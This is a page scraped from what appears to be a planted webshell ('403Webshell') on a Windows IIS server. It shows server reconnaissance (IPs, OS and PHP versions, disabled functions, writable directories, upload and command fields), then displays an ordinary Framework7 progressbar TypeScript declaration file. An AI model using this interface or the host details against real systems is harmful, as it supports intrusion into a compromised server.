403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/framework7/node_modules/framework7/components/progressbar/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/framework7/node_modules/framework7/components/progressbar/progressbar.d.ts
import Framework7, {
  CSSSelector,
  Framework7EventsClass,
  Framework7Plugin,
} from '../app/app-class.js';

export namespace Progressbar {
  interface AppMethods {
    progressbar: {
      /** set progress for Determinate Progressbar */
      set(el: HTMLElement | CSSSelector, progress: number, duration: number): void;
      /** set progress for Determinate Progressbar which is under the app root element */
      set(progress: number, duration: number): void;
      /** create and show or just show (if already presented) Progressbar */
      show(el?: HTMLElement | CSSSelector, progress?: number, color?: string): void;
      show(el?: HTMLElement | CSSSelector, color?: string): void;
      /** create and show Determinate Progressbar under app root */
      show(progress?: number, color?: string): void;
      /** create and show infinite Progressbar under app root */
      show(color?: string): void;
      /** hide Progressbar */
      hide(el?: HTMLElement | CSSSelector): void;
    };
  }
  interface AppParams {}
  interface AppEvents {}
}

declare const ProgressbarComponent: Framework7Plugin;

export default ProgressbarComponent;

Youez - 2016 - github.com/yon3zu
LinuXploit